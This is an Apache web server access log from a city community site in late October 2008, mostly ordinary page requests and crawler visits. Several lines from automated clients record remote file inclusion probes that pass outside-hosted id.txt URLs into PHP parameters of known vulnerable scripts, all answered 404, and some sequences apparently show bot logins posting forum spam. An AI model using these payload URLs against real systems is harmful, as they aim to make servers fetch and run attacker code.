194.165.42.81 - - [30/Oct/2008:06:04:00 -0700] "GET /jodera2/viewforum.php?f=1&topicdays=0&start=23550 HTTP/1.0" 200 11853 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; T312461)" "www.sancarloscity.org"
76.88.173.151 - - [30/Oct/2008:06:04:01 -0700] "GET /picgallery HTTP/1.1" 301 103 "http://sancarloscity.org/" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0; .NET CLR 2.0.50727)" "www.sancarloscity.org"
194.165.42.81 - - [30/Oct/2008:06:04:02 -0700] "GET /jodera2/viewforum.php?f=16 HTTP/1.0" 200 105 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; T312461)" "www.sancarloscity.org"
64.41.133.39 - - [30/Oct/2008:06:04:02 -0700] "GET /listings/event/results.php?letter=v&category_id=4 HTTP/1.1" 200 26329 "http://www.sancarloscity.org/listings/event/results.php?category_id=4" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 1.0.3705)" "www.sancarloscity.org"
76.88.173.151 - - [30/Oct/2008:06:04:02 -0700] "GET /picgallery/ HTTP/1.1" 200 162 "http://sancarloscity.org/" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0; .NET CLR 2.0.50727)" "www.sancarloscity.org"
64.41.133.39 - - [30/Oct/2008:06:04:03 -0700] "GET /listings/event/results.php?letter=p&category_id=4 HTTP/1.1" 200 22354 "http://www.sancarloscity.org/listings/event/results.php?category_id=4" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 1.0.3705)" "www.sancarloscity.org"
194.165.42.81 - - [30/Oct/2008:06:04:03 -0700] "GET /jodera2/viewforum.php?f=21 HTTP/1.0" 200 105 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; T312461)" "www.sancarloscity.org"
194.165.42.81 - - [30/Oct/2008:06:04:03 -0700] "GET /jodera2/viewforum.php?f=7 HTTP/1.0" 200 105 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; T312461)" "www.sancarloscity.org"
194.165.42.81 - - [30/Oct/2008:06:04:04 -0700] "GET /jodera2/profile.php?mode=viewprofile&u=1647 HTTP/1.0" 200 105 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; T312461)" "www.sancarloscity.org"
64.41.133.39 - - [30/Oct/2008:06:04:09 -0700] "GET /listings/event/results.php?letter=f&category_id=4 HTTP/1.1" 200 26329 "http://www.sancarloscity.org/listings/event/results.php?category_id=4" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 1.0.3705)" "www.sancarloscity.org"
64.41.133.39 - - [30/Oct/2008:06:04:13 -0700] "GET /listings/event/results.php?letter=k&category_id=4 HTTP/1.0" 200 26313 "http://www.sancarloscity.org/listings/event/results.php?category_id=4" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 1.0.3705)" "www.sancarloscity.org"
84.16.224.100 - - [30/Oct/2008:06:04:13 -0700] "GET /jodera2/posting.php?mode=reply&t=24077 HTTP/1.0" 200 105 "http://www.sancarloscity.org/jodera2/posting.php?mode=reply&t=24077" "Mozilla/1.22 (compatible; MSIE 2.0; Windows 95)" "www.sancarloscity.org"
84.16.224.100 - - [30/Oct/2008:06:04:13 -0700] "GET / HTTP/1.0" 200 44270 "http://www.sancarloscity.org/" "Mozilla/1.22 (compatible; MSIE 2.0; Windows 95)" "www.sancarloscity.org"
76.88.173.151 - - [30/Oct/2008:06:04:14 -0700] "GET / HTTP/1.1" 200 44270 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0; .NET CLR 2.0.50727)" "sancarloscity.org"
76.88.173.151 - - [30/Oct/2008:06:04:15 -0700] "GET /antenna.css HTTP/1.1" 200 1748 "http://sancarloscity.org/" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0; .NET CLR 2.0.50727)" "sancarloscity.org"
76.88.173.151 - - [30/Oct/2008:06:04:15 -0700] "GET /autoactivate.js HTTP/1.1" 200 5474 "http://sancarloscity.org/" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0; .NET CLR 2.0.50727)" "sancarloscity.org"
76.88.173.151 - - [30/Oct/2008:06:04:15 -0700] "GET /sampo/ HTTP/1.1" 200 2268 "http://sancarloscity.org/" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0; .NET CLR 2.0.50727)" "sancarloscity.org"
76.88.173.151 - - [30/Oct/2008:06:04:15 -0700] "GET /frontbanner.swf HTTP/1.1" 200 0 "http://sancarloscity.org/" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0; .NET CLR 2.0.50727)" "sancarloscity.org"
76.88.173.151 - - [30/Oct/2008:06:04:15 -0700] "GET /sampo/AC_RunActiveContent.js HTTP/1.1" 200 8029 "http://sancarloscity.org/sampo/" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0; .NET CLR 2.0.50727)" "sancarloscity.org"
76.88.173.151 - - [30/Oct/2008:06:04:15 -0700] "GET /sampo/Multichannel.swf HTTP/1.1" 200 0 "http://sancarloscity.org/sampo/" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0; .NET CLR 2.0.50727)" "sancarloscity.org"
76.88.173.151 - - [30/Oct/2008:06:04:16 -0700] "GET /sampo/xml/Dateline.xml HTTP/1.1" 200 0 "http://sancarloscity.org/sampo/Multichannel.swf" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0; .NET CLR 2.0.50727)" "sancarloscity.org"
84.16.224.100 - - [30/Oct/2008:06:04:16 -0700] "GET /forum2/index.php?act=calendar HTTP/1.0" 200 378 "http://www.sancarloscity.org/forum2/index.php?act=calendar" "Mozilla/1.22 (compatible; MSIE 2.0; Windows 95)" "www.sancarloscity.org"
76.88.173.151 - - [30/Oct/2008:06:04:16 -0700] "GET /sampo/playlist.css HTTP/1.1" 200 559 "http://sancarloscity.org/sampo/Multichannel.swf" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0; .NET CLR 2.0.50727)" "sancarloscity.org"
84.16.224.100 - - [30/Oct/2008:06:04:16 -0700] "GET /forum2/index.php?act=calendar HTTP/1.0" 200 378 "http://www.sancarloscity.org/forum2/index.php?act=calendar" "Mozilla/1.22 (compatible; MSIE 2.0; Windows 95)" "www.sancarloscity.org"
84.16.224.100 - - [30/Oct/2008:06:04:17 -0700] "GET /forum2 HTTP/1.0" 301 83 "http://www.sancarloscity.org/forum2" "Mozilla/1.22 (compatible; MSIE 2.0; Windows 95)" "www.sancarloscity.org"
84.16.224.100 - - [30/Oct/2008:06:04:17 -0700] "GET /forum2/ HTTP/1.0" 200 378 "http://www.sancarloscity.org/forum2/" "Mozilla/1.22 (compatible; MSIE 2.0; Windows 95)" "www.sancarloscity.org"
76.88.173.151 - - [30/Oct/2008:06:04:18 -0700] "GET /picgallery HTTP/1.1" 301 103 "http://sancarloscity.org/" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0; .NET CLR 2.0.50727)" "www.sancarloscity.org"
76.88.173.151 - - [30/Oct/2008:06:04:18 -0700] "GET /picgallery/ HTTP/1.1" 200 162 "http://sancarloscity.org/" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0; .NET CLR 2.0.50727)" "www.sancarloscity.org"
202.171.48.89 - - [30/Oct/2008:06:04:20 -0700] "GET /logs/access_080415.log/index.php?cat=http://djvirgil.nl/modules/id.txt?? HTTP/1.1" 404 768 "-" "libwww-perl/5.79" "www.sancarloscity.org"
202.171.48.89 - - [30/Oct/2008:06:04:20 -0700] "GET /index.php?cat=http://djvirgil.nl/modules/id.txt?? HTTP/1.1" 404 758 "-" "libwww-perl/5.79" "www.sancarloscity.org"
202.171.48.89 - - [30/Oct/2008:06:04:21 -0700] "GET /logs/index.php?cat=http://djvirgil.nl/modules/id.txt?? HTTP/1.1" 404 763 "-" "libwww-perl/5.79" "www.sancarloscity.org"
202.171.48.89 - - [30/Oct/2008:06:04:23 -0700] "GET /logs/access_080415.log/index.php?cat=http://djvirgil.nl/modules/id.txt?? HTTP/1.1" 404 768 "-" "libwww-perl/5.79" "www.sancarloscity.org"
202.171.48.89 - - [30/Oct/2008:06:04:24 -0700] "GET /index.php?cat=http://djvirgil.nl/modules/id.txt?? HTTP/1.1" 404 758 "-" "libwww-perl/5.79" "www.sancarloscity.org"
202.171.48.89 - - [30/Oct/2008:06:04:24 -0700] "GET /logs/index.php?cat=http://djvirgil.nl/modules/id.txt?? HTTP/1.1" 404 763 "-" "libwww-perl/5.79" "www.sancarloscity.org"
76.88.173.151 - - [30/Oct/2008:06:04:26 -0700] "GET /forum2 HTTP/1.1" 301 99 "http://sancarloscity.org/" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0; .NET CLR 2.0.50727)" "www.sancarloscity.org"
76.88.173.151 - - [30/Oct/2008:06:04:27 -0700] "GET /forum2/ HTTP/1.1" 200 394 "http://sancarloscity.org/" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0; .NET CLR 2.0.50727)" "www.sancarloscity.org"
72.30.142.88 - - [30/Oct/2008:06:04:30 -0700] "GET /picgallery/displayimage.php?album=topn&cat=7&pos=2 HTTP/1.0" 200 10184 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.sancarloscity.org"
202.171.48.89 - - [30/Oct/2008:06:04:30 -0700] "GET /logs/access_080126.log/index.php?cat=http://djvirgil.nl/modules/id.txt?? HTTP/1.1" 404 768 "-" "libwww-perl/5.79" "www.sancarloscity.org"
64.41.133.39 - - [30/Oct/2008:06:04:33 -0700] "GET /listings/event/results.php?letter=b&category_id=4 HTTP/1.1" 200 20711 "http://www.sancarloscity.org/listings/event/results.php?category_id=4" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 1.0.3705)" "www.sancarloscity.org"
202.171.48.89 - - [30/Oct/2008:06:04:33 -0700] "GET /logs/access_080126.log/index.php?cat=http://djvirgil.nl/modules/id.txt?? HTTP/1.1" 404 768 "-" "libwww-perl/5.79" "www.sancarloscity.org"
64.41.133.39 - - [30/Oct/2008:06:04:38 -0700] "GET /listings/event/results.php?letter=m&category_id=4 HTTP/1.1" 200 10508 "http://www.sancarloscity.org/listings/event/results.php?category_id=4" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 1.0.3705)" "www.sancarloscity.org"
92.48.83.200 - - [30/Oct/2008:06:04:38 -0700] "GET /logs//modules/My_eGallery/public/displayCategory.php?basepath=http://achival.cl/a/modules/xcgal/albums/idfeel.txt?? HTTP/1.1" 404 788 "-" "Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.7.6) Gecko/20050512 Firefox" "www.sancarloscity.org"
92.48.83.200 - - [30/Oct/2008:06:04:38 -0700] "GET /modules/My_eGallery/public/displayCategory.php?basepath=http://achival.cl/a/modules/xcgal/albums/idfeel.txt?? HTTP/1.1" 404 782 "-" "Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.7.6) Gecko/20050512 Firefox" "www.sancarloscity.org"
92.48.83.200 - - [30/Oct/2008:06:04:38 -0700] "GET /logs/access_081007.log//modules/My_eGallery/public/displayCategory.php?basepath=http://achival.cl/a/modules/xcgal/albums/idfeel.txt?? HTTP/1.1" 404 806 "-" "Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.7.6) Gecko/20050512 Firefox" "www.sancarloscity.org"
64.41.133.39 - - [30/Oct/2008:06:04:42 -0700] "GET /listings/event/results.php?letter=no&category_id=4 HTTP/1.1" 200 17412 "http://www.sancarloscity.org/listings/event/results.php?category_id=4" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 1.0.3705)" "www.sancarloscity.org"
64.41.133.39 - - [30/Oct/2008:06:04:50 -0700] "GET /listings/event/results.php?letter=l&category_id=4 HTTP/1.1" 200 10508 "http://www.sancarloscity.org/listings/event/results.php?category_id=4" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 1.0.3705)" "www.sancarloscity.org"
64.41.133.39 - - [30/Oct/2008:06:04:57 -0700] "GET /listings/event/results.php?letter=y&category_id=4 HTTP/1.1" 200 10508 "http://www.sancarloscity.org/listings/event/results.php?category_id=4" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 1.0.3705)" "www.sancarloscity.org"
64.41.133.39 - - [30/Oct/2008:06:04:59 -0700] "GET /listings/event/results.php?letter=o&category_id=4 HTTP/1.1" 200 10508 "http://www.sancarloscity.org/listings/event/results.php?category_id=4" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 1.0.3705)" "www.sancarloscity.org"
64.41.133.39 - - [30/Oct/2008:06:05:05 -0700] "GET /listings/event/results.php?letter=z&category_id=4 HTTP/1.1" 200 10508 "http://www.sancarloscity.org/listings/event/results.php?category_id=4" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 1.0.3705)" "www.sancarloscity.org"
64.41.133.39 - - [30/Oct/2008:06:05:12 -0700] "GET /listings/event/results.php?letter=w&category_id=4 HTTP/1.1" 200 10508 "http://www.sancarloscity.org/listings/event/results.php?category_id=4" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 1.0.3705)" "www.sancarloscity.org"
64.41.133.39 - - [30/Oct/2008:06:05:20 -0700] "GET /listings/event/results.php?letter=j&category_id=4 HTTP/1.1" 200 10508 "http://www.sancarloscity.org/listings/event/results.php?category_id=4" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 1.0.3705)" "www.sancarloscity.org"
64.41.133.39 - - [30/Oct/2008:06:05:26 -0700] "GET /listings/event/results.php?letter=u&category_id=4 HTTP/1.1" 200 10508 "http://www.sancarloscity.org/listings/event/results.php?category_id=4" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 1.0.3705)" "www.sancarloscity.org"
84.16.231.171 - - [30/Oct/2008:06:05:28 -0700] "GET /jodera2/posting.php?mode=reply&t=24080 HTTP/1.0" 302 0 "http://www.sancarloscity.org/jodera2/posting.php?mode=reply&t=24080" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; Media Center PC" "www.sancarloscity.org"
84.16.231.171 - - [30/Oct/2008:06:05:28 -0700] "GET /jodera2/login.php?redirect=posting.php&mode=reply&t=24080&sid=a17f323cf21b3bc825509a9bb8a009d1 HTTP/1.0" 200 12363 "http://www.sancarloscity.org/jodera2/login.php?redirect=posting.php&mode=reply&t=24080&sid=a17f323cf21b3bc825509a9bb8a009d1" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; Media Center PC" "www.sancarloscity.org"
64.41.133.39 - - [30/Oct/2008:06:05:30 -0700] "GET /listings/event/results.php?letter=q&category_id=4 HTTP/1.1" 200 10508 "http://www.sancarloscity.org/listings/event/results.php?category_id=4" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 1.0.3705)" "www.sancarloscity.org"
84.16.231.171 - - [30/Oct/2008:06:05:30 -0700] "POST /jodera2/login.php HTTP/1.0" 302 0 "http://www.sancarloscity.org/jodera2/login.php?redirect=posting.php&mode=reply&t=24080&sid=a17f323cf21b3bc825509a9bb8a009d1" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; Media Center PC" "www.sancarloscity.org"
84.16.231.171 - - [30/Oct/2008:06:05:32 -0700] "GET /jodera2/posting.php?mode=reply&t=24080&sid=a17f323cf21b3bc825509a9bb8a009d1 HTTP/1.0" 200 50830 "http://www.sancarloscity.org/jodera2/posting.php?mode=reply&t=24080&sid=a17f323cf21b3bc825509a9bb8a009d1" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; Media Center PC" "www.sancarloscity.org"
64.41.133.39 - - [30/Oct/2008:06:05:33 -0700] "GET /listings/event/results.php?letter=i&category_id=4 HTTP/1.1" 200 10508 "http://www.sancarloscity.org/listings/event/results.php?category_id=4" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 1.0.3705)" "www.sancarloscity.org"
64.41.133.39 - - [30/Oct/2008:06:05:35 -0700] "GET /listings/event/results.php?letter=d&category_id=4 HTTP/1.1" 200 17395 "http://www.sancarloscity.org/listings/event/results.php?category_id=4" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 1.0.3705)" "www.sancarloscity.org"
217.133.215.166 - - [30/Oct/2008:06:05:50 -0700] "GET /logs/access_080916.log//components/com_mambatstaff/mambatstaff.php?mosConfig_absolute_path=http://djvirgil.nl/modules/id.txt?? HTTP/1.1" 404 802 "-" "libwww-perl/5.805" "www.sancarloscity.org"
217.133.215.166 - - [30/Oct/2008:06:05:52 -0700] "GET /components/com_mambatstaff/mambatstaff.php?mosConfig_absolute_path=http://djvirgil.nl/modules/id.txt?? HTTP/1.1" 404 778 "-" "libwww-perl/5.805" "www.sancarloscity.org"
217.133.215.166 - - [30/Oct/2008:06:05:56 -0700] "GET /logs//components/com_mambatstaff/mambatstaff.php?mosConfig_absolute_path=http://djvirgil.nl/modules/id.txt?? HTTP/1.1" 404 784 "-" "libwww-perl/5.805" "www.sancarloscity.org"
89.149.202.60 - - [30/Oct/2008:06:05:56 -0700] "GET /jodera2/posting.php?mode=reply&t=24082 HTTP/1.0" 302 0 "http://www.sancarloscity.org/jodera2/posting.php?mode=reply&t=24082" "Mozilla/1.22 (compatible; MSIE 2.0; Windows 95)" "www.sancarloscity.org"
89.149.202.60 - - [30/Oct/2008:06:06:03 -0700] "GET /jodera2/login.php?redirect=posting.php&mode=reply&t=24082&sid=b560149841ec4589acc6fe69df3d658a HTTP/1.0" 200 12363 "http://www.sancarloscity.org/jodera2/login.php?redirect=posting.php&mode=reply&t=24082&sid=b560149841ec4589acc6fe69df3d658a" "Mozilla/1.22 (compatible; MSIE 2.0; Windows 95)" "www.sancarloscity.org"
211.206.124.42 - - [30/Oct/2008:06:06:09 -0700] "GET /logs///skin/zero_vote/error.php?dir=http://www.codeduc.cl/components/id.txt???? HTTP/1.1" 404 767 "-" "libwww-perl/5.79" "www.sancarloscity.org"
211.206.124.42 - - [30/Oct/2008:06:06:09 -0700] "GET //skin/zero_vote/error.php?dir=http://www.codeduc.cl/components/id.txt???? HTTP/1.1" 404 761 "-" "libwww-perl/5.79" "www.sancarloscity.org"
211.206.124.42 - - [30/Oct/2008:06:06:09 -0700] "GET /logs/access_081002.log///skin/zero_vote/error.php?dir=http://www.codeduc.cl/components/id.txt???? HTTP/1.1" 404 785 "-" "libwww-perl/5.79" "www.sancarloscity.org"
89.149.202.60 - - [30/Oct/2008:06:06:10 -0700] "POST /jodera2/login.php HTTP/1.0" 302 0 "http://www.sancarloscity.org/jodera2/login.php?redirect=posting.php&mode=reply&t=24082&sid=b560149841ec4589acc6fe69df3d658a" "Mozilla/1.22 (compatible; MSIE 2.0; Windows 95)" "www.sancarloscity.org"
64.41.133.39 - - [30/Oct/2008:06:06:11 -0700] "GET /listings/event/results.php?letter=o&category_id=4 HTTP/1.1" 200 10508 "http://www.sancarloscity.org/listings/event/results.php?category_id=4" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 1.0.3705)" "www.sancarloscity.org"
89.149.202.60 - - [30/Oct/2008:06:06:18 -0700] "GET /jodera2/posting.php?mode=reply&t=24082&sid=b560149841ec4589acc6fe69df3d658a HTTP/1.0" 200 50625 "http://www.sancarloscity.org/jodera2/posting.php?mode=reply&t=24082&sid=b560149841ec4589acc6fe69df3d658a" "Mozilla/1.22 (compatible; MSIE 2.0; Windows 95)" "www.sancarloscity.org"
211.206.124.42 - - [30/Oct/2008:06:06:19 -0700] "GET /logs/access_081002.log///skin/zero_vote/error.php?dir=http://www.codeduc.cl/components/id.txt???? HTTP/1.1" 404 785 "-" "libwww-perl/5.79" "www.sancarloscity.org"
211.206.124.42 - - [30/Oct/2008:06:06:19 -0700] "GET /logs///skin/zero_vote/error.php?dir=http://www.codeduc.cl/components/id.txt???? HTTP/1.1" 404 767 "-" "libwww-perl/5.79" "www.sancarloscity.org"
211.206.124.42 - - [30/Oct/2008:06:06:19 -0700] "GET //skin/zero_vote/error.php?dir=http://www.codeduc.cl/components/id.txt???? HTTP/1.1" 404 761 "-" "libwww-perl/5.79" "www.sancarloscity.org"
89.149.227.208 - - [30/Oct/2008:06:06:23 -0700] "GET /jodera2/posting.php?mode=reply&t=24083 HTTP/1.0" 302 0 "http://www.sancarloscity.org/jodera2/posting.php?mode=reply&t=24083" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; KTXN)" "www.sancarloscity.org"
89.149.227.208 - - [30/Oct/2008:06:06:26 -0700] "GET /jodera2/login.php?redirect=posting.php&mode=reply&t=24083&sid=ad80a4274b7ccab46482c9897a962334 HTTP/1.0" 200 12363 "http://www.sancarloscity.org/jodera2/login.php?redirect=posting.php&mode=reply&t=24083&sid=ad80a4274b7ccab46482c9897a962334" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; KTXN)" "www.sancarloscity.org"
89.149.227.208 - - [30/Oct/2008:06:06:30 -0700] "POST /jodera2/login.php HTTP/1.0" 302 0 "http://www.sancarloscity.org/jodera2/login.php?redirect=posting.php&mode=reply&t=24083&sid=ad80a4274b7ccab46482c9897a962334" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; KTXN)" "www.sancarloscity.org"
89.149.227.208 - - [30/Oct/2008:06:06:36 -0700] "GET /jodera2/posting.php?mode=reply&t=24083&sid=ad80a4274b7ccab46482c9897a962334 HTTP/1.0" 200 50594 "http://www.sancarloscity.org/jodera2/posting.php?mode=reply&t=24083&sid=ad80a4274b7ccab46482c9897a962334" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; KTXN)" "www.sancarloscity.org"
211.206.124.42 - - [30/Oct/2008:06:06:37 -0700] "GET /logs/access_081015.log///skin/zero_vote/error.php?dir=http://www.codeduc.cl/components/id.txt???? HTTP/1.1" 404 785 "-" "libwww-perl/5.79" "www.sancarloscity.org"
211.206.124.42 - - [30/Oct/2008:06:06:46 -0700] "GET /logs/access_081015.log///skin/zero_vote/error.php?dir=http://www.codeduc.cl/components/id.txt???? HTTP/1.1" 404 785 "-" "libwww-perl/5.79" "www.sancarloscity.org"
84.16.231.171 - - [30/Oct/2008:06:07:00 -0700] "POST /jodera2/posting.php HTTP/1.0" 500 292 "http://www.sancarloscity.org/jodera2/posting.php?mode=reply&t=24080&sid=a17f323cf21b3bc825509a9bb8a009d1" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; Media Center PC" "www.sancarloscity.org"
89.149.227.208 - - [30/Oct/2008:06:07:00 -0700] "POST /jodera2/posting.php HTTP/1.0" 500 292 "http://www.sancarloscity.org/jodera2/posting.php?mode=reply&t=24083&sid=ad80a4274b7ccab46482c9897a962334" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; KTXN)" "www.sancarloscity.org"
64.41.133.39 - - [30/Oct/2008:06:07:09 -0700] "GET /listings/listing/results.php?category_id=709 HTTP/1.1" 200 26705 "http://www.sancarloscity.org/listings/listing/results.php?letter=p&category_id=750" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 1.0.3705)" "www.sancarloscity.org"
203.146.26.91 - - [30/Oct/2008:06:07:11 -0700] "GET /logs/access_081006.log/phphtml.php?htmlclass_path=http://610times.com/bbs/info/id.txt?? HTTP/1.1" 404 770 "-" "libwww-perl/5.79" "www.sancarloscity.org"
203.146.26.91 - - [30/Oct/2008:06:07:11 -0700] "GET /phphtml.php?htmlclass_path=http://610times.com/bbs/info/id.txt?? HTTP/1.1" 404 760 "-" "libwww-perl/5.79" "www.sancarloscity.org"
203.146.26.91 - - [30/Oct/2008:06:07:12 -0700] "GET /logs/phphtml.php?htmlclass_path=http://610times.com/bbs/info/id.txt?? HTTP/1.1" 404 765 "-" "libwww-perl/5.79" "www.sancarloscity.org"
64.41.133.39 - - [30/Oct/2008:06:07:17 -0700] "GET /listings/listing/results.php?category_id=711 HTTP/1.1" 200 31209 "http://www.sancarloscity.org/listings/listing/results.php?letter=p&category_id=750" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 1.0.3705)" "www.sancarloscity.org"
72.30.142.88 - - [30/Oct/2008:06:07:21 -0700] "GET /listings/claim.php?claimlistingid=14952 HTTP/1.0" 200 12411 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.sancarloscity.org"
64.41.133.39 - - [30/Oct/2008:06:07:24 -0700] "GET /listings/listing/results.php?category_id=721 HTTP/1.1" 200 24446 "http://www.sancarloscity.org/listings/listing/results.php?letter=p&category_id=750" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 1.0.3705)" "www.sancarloscity.org"
89.149.202.60 - - [30/Oct/2008:06:07:24 -0700] "POST /jodera2/posting.php HTTP/1.0" 200 11444 "http://www.sancarloscity.org/jodera2/posting.php?mode=reply&t=24082&sid=b560149841ec4589acc6fe69df3d658a" "Mozilla/1.22 (compatible; MSIE 2.0; Windows 95)" "www.sancarloscity.org"
64.41.133.39 - - [30/Oct/2008:06:07:28 -0700] "GET /listings/listing/results.php?category_id=698 HTTP/1.1" 200 33523 "http://www.sancarloscity.org/listings/listing/results.php?letter=p&category_id=750" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 1.0.3705)" "www.sancarloscity.org"
64.41.133.39 - - [30/Oct/2008:06:07:31 -0700] "GET /listings/listing/results.php?category_id=733 HTTP/1.1" 200 47168 "http://www.sancarloscity.org/listings/listing/results.php?letter=p&category_id=750" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 1.0.3705)" "www.sancarloscity.org"
64.41.133.39 - - [30/Oct/2008:06:07:33 -0700] "GET /listings/listing/results.php?category_id=744 HTTP/1.1" 200 28921 "http://www.sancarloscity.org/listings/listing/results.php?letter=p&category_id=750" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 1.0.3705)" "www.sancarloscity.org"
64.41.133.39 - - [30/Oct/2008:06:07:35 -0700] "GET /listings/listing/results.php?category_id=691 HTTP/1.1" 200 53084 "http://www.sancarloscity.org/listings/listing/results.php?letter=p&category_id=750" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 1.0.3705)" "www.sancarloscity.org"
64.41.133.39 - - [30/Oct/2008:06:07:40 -0700] "GET /listings/listing/results.php?category_id=714 HTTP/1.1" 200 24415 "http://www.sancarloscity.org/listings/listing/results.php?letter=p&category_id=750" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 1.0.3705)" "www.sancarloscity.org"
64.41.133.39 - - [30/Oct/2008:06:07:42 -0700] "GET /listings/listing/results.php?category_id=732 HTTP/1.1" 200 31141 "http://www.sancarloscity.org/listings/listing/results.php?letter=p&category_id=750" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 1.0.3705)" "www.sancarloscity.org"
64.41.133.39 - - [30/Oct/2008:06:07:45 -0700] "GET /listings/listing/results.php?category_id=708 HTTP/1.1" 200 24431 "http://www.sancarloscity.org/listings/listing/results.php?letter=p&category_id=750" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 1.0.3705)" "www.sancarloscity.org"
